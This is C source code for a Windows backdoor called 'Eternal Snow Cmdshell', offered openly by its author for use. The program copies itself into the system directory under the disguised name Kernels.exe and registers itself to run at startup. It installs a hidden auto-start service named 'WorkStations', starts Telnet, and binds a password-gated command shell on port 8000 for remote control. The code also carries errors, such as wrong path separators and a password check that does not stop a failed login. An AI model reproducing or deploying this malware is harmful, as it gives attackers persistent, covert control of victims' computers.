/*
Delphiscn Eternal Snow Cmdshell Version 1.0
This Backdoor is written by Delphiscn.It is support for Windows NT/2000/XP/2003.
You can use a nc to control a remote computer which is runing with this software.
Complied and Tested in Windows XP SP2 CN 2000/2003 NOT TESTED.
Can not run in Windows 98/ME
Details
Eternal snow will create a service(Workstations) on the Remote System. And Bind Service Computer on port 8000.
Then . It will also Try to Start Telnet Service in the Remote System which is support for NT.
An Attacker can control it IF he konw the password --Neverland.
Referrence
1.msdn
2.www.xFocus.org
More Information
Delphiscn@www.EvilOctal.com
cnBlater(at)hotmail(dot)com
http://spaces.msn.com/members/delphiscn
2005-08-15*/
#include<winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <winsvc.h>
#include <Psapi.h>
#pragma comment( lib,"Psapi.lib")
#pragma comment(lib, "ws2_32.lib")
#define password "Neverland"
BOOL reg(char *szExecFile);
void OnCreate();
void StartTelnet();
void Help();
BOOL reg(char *szExecFile)
{
HKEY hKEY;
LPCTSTR data_Set="SOFTWARE//Microsoft//Windows//CurrentVersion//Run//";
long snow0=(::RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_ALL_ACCESS,&hKEY));
if(snow0!=ERROR_SUCCESS) return(false);
LPBYTE username_Get=(unsigned char*)malloc(sizeof(BYTE)*80);
DWORD cbData_1=80;
DWORD dwType;
long snow1=::RegQueryValueEx(hKEY,"Dlls", 0,&dwType, username_Get,&cbData_1);
if(snow1!=ERROR_SUCCESS)
{
DWORD setsize;
setsize=strlen(szExecFile)+1;
dwType=REG_SZ;
long snow3=::RegSetValueEx(hKEY,"Kernels", 0, dwType, (const unsigned char*) szExecFile, setsize);
if(snow3!=ERROR_SUCCESS) {return(false);}
}
free(username_Get);
::RegCloseKey(hKEY);
return(true);
}
int EnablePrivilege(LPCTSTR lpszPrivilegeName,BOOL bEnable)
/*
Thanks to Sunlion[E.S.T]
*/
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |
TOKEN_QUERY | TOKEN_READ,&hToken))
return 0;
if(!LookupPrivilegeValue(NULL, lpszPrivilegeName, &luid))
return 1;
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = (bEnable) ? SE_PRIVILEGE_ENABLED : 0;
AdjustTokenPrivileges(hToken,FALSE,&tp,NULL,NULL,NULL);
CloseHandle(hToken);
return 0;
}
void Help()
{
printf("Eternal Sonw Cmdshell in Windows NT System Support For 2000/XP/2003 Version 1.0/n");
printf("CODE BY Delphiscn@www.EvilOctal.com E-mail:cnBlaster(at)hotmail(dot)com/n");
printf("Complied in Windows XP SP2 CN 2005-08");
return;
}
int main(int argc,char *argv[])
{
GetModuleFileName(NULL,argv[0],255);
char szNewPlace[255];
GetSystemDirectory(szNewPlace,255);
strcat(szNewPlace,"//Kernels.exe");
if( strcmp(argv[0],szNewPlace) != 0 )
{CopyFile(argv[0],szNewPlace,FALSE);}
if(!reg(szNewPlace))
{return 0;}
OnCreate();
StartTelnet();
system("cls.exe");
Help();
WSADATA wsaData;
char buff[4096];
int Eternal;
if ((Eternal = WSAStartup(MAKEWORD(2,2), &wsaData)) != 0)
{
printf("WSAStartup Failed: %d/n",Eternal);
return -1;
}
int port=8000;
int RemoteServer,LocalClient;
struct sockaddr_in addrServer,addrClient;
char *MSG="/n/r Welcome Hacker";
char *getpass="/r/n Your Password is:";
char *passok="/r/n ok";
char *error="/r/n Error Password Please Try it again";
RemoteServer=socket(AF_INET,SOCK_STREAM,0);
addrServer.sin_family=AF_INET;
addrServer.sin_port=htons(port);
addrServer.sin_addr.s_addr=ADDR_ANY;
int TimeOut=50000;
setsockopt(RemoteServer,SOL_SOCKET,SO_RCVTIMEO,(char*)&TimeOut,sizeof(TimeOut));
UINT bReUser=1;
setsockopt(RemoteServer,SOL_SOCKET,SO_REUSEADDR,(char*)&bReUser,sizeof(bReUser));
bind(RemoteServer,(struct sockaddr*)&addrServer,sizeof(addrServer));
listen(RemoteServer,5);
printf("Bind Server is OK/n%d",port);
int iLen=sizeof(addrClient);
LocalClient=accept(RemoteServer,(struct sockaddr*)&addrClient,&iLen);
if (LocalClient != INVALID_SOCKET)
{
int iTimeOut=50000;
setsockopt(LocalClient,SOL_SOCKET,SO_RCVTIMEO,(char*)&iTimeOut,sizeof(iTimeOut));
}
else return -1;
send(LocalClient,MSG,strlen(MSG),0);
send(LocalClient,getpass,strlen(getpass),0);
recv(LocalClient,buff,1024,0);
if(!(strstr(buff,password)))
{
send(LocalClient, error, strlen(error), 0);
printf("/r/n PassWord ERROR!");
closesocket(LocalClient);
}
send(LocalClient, passok, strlen(passok), 0);
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
unsigned long lBytesRead;
SECURITY_ATTRIBUTES sa;
sa.nLength=12;
sa.lpSecurityDescriptor=0;
sa.bInheritHandle=TRUE;
CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0);
CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0);
STARTUPINFO siinfo;
char cmdLine[] = "Kernels.exe";
PROCESS_INFORMATION ProcessInformation;
ZeroMemory(&siinfo,sizeof(siinfo));
siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
siinfo.wShowWindow = SW_HIDE;
siinfo.hStdInput = hReadPipe2;
siinfo.hStdOutput = siinfo.hStdError = hWritePipe1;
printf("/r/n Pipe Create OK!");
int bread = CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);
while(1)
{
int ret = PeekNamedPipe(hReadPipe1,buff,1024,&lBytesRead,0,0);
if(lBytesRead)
{
ret = ReadFile(hReadPipe1,buff,lBytesRead,&lBytesRead,0);
if(!ret) break;
ret = send(LocalClient,buff,lBytesRead,0);
if(ret <= 0) break;
}
else
{
lBytesRead = recv(LocalClient,buff,1024,0);
if(lBytesRead <= 0) break;
ret = WriteFile(hWritePipe2,buff,lBytesRead,&lBytesRead,0);
}
}
closesocket(LocalClient);
closesocket(RemoteServer);
return 0;
}
void OnCreate()
{
char szNewPlace[255];
GetSystemDirectory(szNewPlace,255);
strcat(szNewPlace,"//Kernels.exe");
EnablePrivilege(SE_DEBUG_NAME,TRUE);
SC_HANDLE scm;
SC_HANDLE scv;
scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if (scm!=NULL)
{
scv=::CreateService(scm,
"WorkStations",
"WorkStations",
SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS,SERVICE_INTERACTIVE_PROCESS,
SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,
szNewPlace,
NULL,NULL,NULL,NULL);
if (scv!=NULL)
{
::CloseServiceHandle(scv);
}
else
{
::CloseServiceHandle(scm);
}
}
}
void StartTelnet()
{
EnablePrivilege(SE_DEBUG_NAME,TRUE);
SC_HANDLE scm;
SC_HANDLE scv;
scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if(scm!=NULL)
{
scv=::OpenService(scm,"Telnet",SERVICE_ALL_ACCESS);
if (scv!=NULL)
{
::StartService(scv,0,NULL);
::CloseServiceHandle(scv);
}
::CloseServiceHandle(scm);
}
}
/*
Complied with Visual C++.Net
Good Luck ^.^
*/